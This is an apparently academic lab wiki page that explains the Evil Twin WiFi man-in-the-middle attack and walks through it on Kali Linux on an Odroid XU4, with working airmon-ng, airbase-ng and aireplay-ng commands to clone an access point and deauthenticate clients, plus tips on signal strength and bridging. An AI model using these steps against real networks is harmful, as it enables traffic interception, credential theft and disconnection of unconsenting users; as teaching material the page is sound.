Evil Twin Attack via Kali on Odroid XU4

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

Summary

The Evil Twin (ET) Attack is a type of Machine-in-the-Middle (MitM) attack that is carried out via WiFi. The basic premise of the attack is to fool victims into thinking they are connecting to a legitimate access point (AP), when in fact they are connecting to the "evil twin" AP.

The goal of the attack usually coincides with the typical goals of any MitM attack. As every traffic leaving the local network to be routed over the internet leaves the LAN over the default gateway, an attacker can intercept all outgoing traffic when a client is connected to the ET. Attackers then redirect the traffic received by the victim to the legitimate gateway, posing as the victim machine. Network traffic now flows like normal, but via the attacker. Endpoints can still communicate with each other like before, but the victim's data is now at the attacker’s mercy. This data can be passwords or entire sessions to access e-mail accounts or social networks. When considering the attack by comparing it against the CIA Triad, the implications are massive. An attacker in this position can compromise confidentiality by eavesdropping, and integrity by message modification. They can also intercept, modify, or destroy the messages to compromise availability.

The attack is conducted as follows: First, the attacker has to figure out which access point the intended victim is using. In the case no specific victim is targeted, attackers could also choose a commonly used access point like a public WiFi hotspot. If the access point that is going to be impersonated is fixated, in a second step the attacker has to take note of the APs Service Set Identification (SSID) number, and the Basic Service Set Identification (BSSID) number. The SSID is the name that is displayed for users trying to connect to a WiFi AP, while the BSSID is the physical MAC address of said AP. This is no complicated feat, as access points send out these two numbers constantly to allow users to connect. Following this premise, if the attacker sends out this information themselves, the evil twin will show up on the victim's device in the list of access points to connect to, with the same SSID and BSSID as the legitimate access point. With appropriate tools that will be described in more detail below, clients can be disconnected from the legitimate AP. The goal is to then broadcast with a stronger signal than the legitimate access point, fooling users to connect to the "best" available access point.

If the original access point is password protected, according measures need to be taken. Password protected access points are not immune to Evil Twin Attacks, especially when dealing with access points with easily obtainable passwords. This includes cafés, hotels, and similar institutions that tend to share their provided access point's password with their customer base. But even a private WiFi hotspot's password can be obtained through social engineering attacks without much sophistication. For example, attackers innocently asking for a WiFi password can fool a person knowing the password into giving it up. Another possibility is capturing a WPA handshake between the legitimate AP and a client and cracking the transmitted hash. In any case, as soon as the password is obtained, it can be added to the evil twin configuration.


Requirements/Hardware

Operating system: Kali Linux ODROID-XU3

Hardware:

  • Exisiting WiFi hotspot for impersonation
  • Client connected to WiFi hotspot
  • ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
  • eMMC (min. 8GB)
  • microSD (min. 8GB)
  • microSD to USB adapter
  • Mouse
  • Keyboard
  • Monitor (via HDMI)
  • Two WiFi adapters (e.g. Alfa AWUS036EAC)

Installing Kali on ODROID XU4

Step 1: Download

Download the Kali image. The ODROID XU4 OS is very similar to the ODROID XU3 OS, thus the OS of XU3 can be used for a XU4 board.

Step 2: Preparation

Note: It is recommended to use Balena Etcher, as it works for different OS and does the two steps of formatting and flashing in the same process.

  • Insert the microSD card into you PC (if required use the adapter)
  • Format the microSD card with Balena Etcher or SD Fortmatter. If you use SD Formatter: Don't forget to check "Format Size Adjustment" in "Options".
  • Flash the OS to the microSD card. Required: A program to create bootable devices, e.g. Win32 Disk Imager for Windows.

Step 3: Installing

For the following steps you might need the manual for ODROID XU4 to see where the mentioned parts are located.

  • Stick the eMMC to the ODROID XU4
  • Switch the Boot Mode Selector to "microSD"
  • Put in the microSD card
  • Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting - otherwise you will receive a kernel error.
  • After that: attach the power supply.


If all steps were performed correctly:

  • The fan of the ODROID XU4 starts
  • The blue LED should be on (solid light): bootloader running.
  • Monitor should display booting.

This can take a while.

Username: kali
Password: kali


States of the ODROID XU4 LED:

  • red LED: is on when power is available
  • blue LED (solid): when the bootloader is running
  • blue LED (blinks slowly, like a heartbeat): kernel is running
  • blue LED (blinks fast): kernel is in panic mode

Performing the Evil Twin Attack on Kali Linux

Interface Designation and Information Gathering

Add the WiFi adapters to the XU4 and check if they are recognized

sudo ifconfig

If the interfaces are not recognized, try rebooting the XU4.


Check the available wireless interfaces

Take note of their names, as the interfaces will be used in the attack.

sudo iwconfig 


Find out the BSSID and which channel the legitimate AP uses

This can be done in two ways. If the SSID (common name) of the hotspot is known, take one of the available wireless interfaces from the step before and use the command

iw <interface name> scan | grep -B 8 -A 2 <SSID>

This displays the information about the specified SSID if it is represented in the list of available APs. The output contains SSID, BSSID and channel.

Alternatively, the channel is also denotified in the output of airodump-ng. To use airodump-ng, first enter one of the available interfaces into monitor mode:

sudo airmon-ng start <interface name>

Then, analyze the output of the tool:

sudo airodump-ng <monitoring interface name>

After gathering the information, be sure to stop the monitoring for now:

sudo airmon-ng stop <monitoring interface name>


Start monitor mode on an available wireless interface.

sudo airmon-ng start <interface> <channel>

Cue: Output has to contain "monitor mode enabled"


Evil Twin Access Point Creation

Insert the captured SSID and BSSID information:

sudo airbase-ng -a <BSSID> --essid <ESSID> <interface>

After running the command, airbase turns the wireless adapter into an access point. It now shows up in the list of available APs on devices in the area, carrying the same name as the legitimate AP.


Disassociation of Clients

Open a new terminal.

In this step, clients of the legitimate access points will be deauthenticated and will lose their internet connection.

Deauthenticating clients

sudo aireplay-ng --deauth 0 -a <router BSSID> <second monitoring interface>

The "0" indicates how fast the deauthentication packets will be sent (in seconds). 0 is the fastest option and will spam the deauthentication packet. For this command to work, te monitoring interface used has to be in the right channel!

This command might not work because it could produce a broadcast storm, so some WiFi routers filter them.

Alternatively, a specific client can be disconnected by specifying the client MAC address.


Disconnect a specific client:

First run the airodump-ng command again, but with the BSSID of the router to receive the MAC address of the client:

sudo airodump-ng <monitoring interface> --bssid <router BSSID> -c <routers channel>

Then execute the deauth-command:

sudo aireplay-ng --deauth 0 -c <client MAC address> -a <router BSSID> <second monitoring interface>


Bring clients to connect to the fake AP

As soon as clients are disassociated from the legitimate AP, they lose their internet connectivity. When trying to reconnect to the AP, they are probably going to click on the AP with the best signal, which - depending on OS - will usually also be displayed at the top of the list of available APs. This means that it is in the interest of the attacker to move close to the victim, and use a strong antenna, to increase the signal strength and the chances of success.

Additionally, before deauthentication, the attacker should create a bridge to assure that the traffic flows over the ET to the legitimate router to provide internet connectivity to the victim and complete the MitM setup.


Error handling

If neither disconnecting all clients nor disconnecting a specific client worked, you can check if the card supports injection:

sudo aireplay-ng --test <interface>

References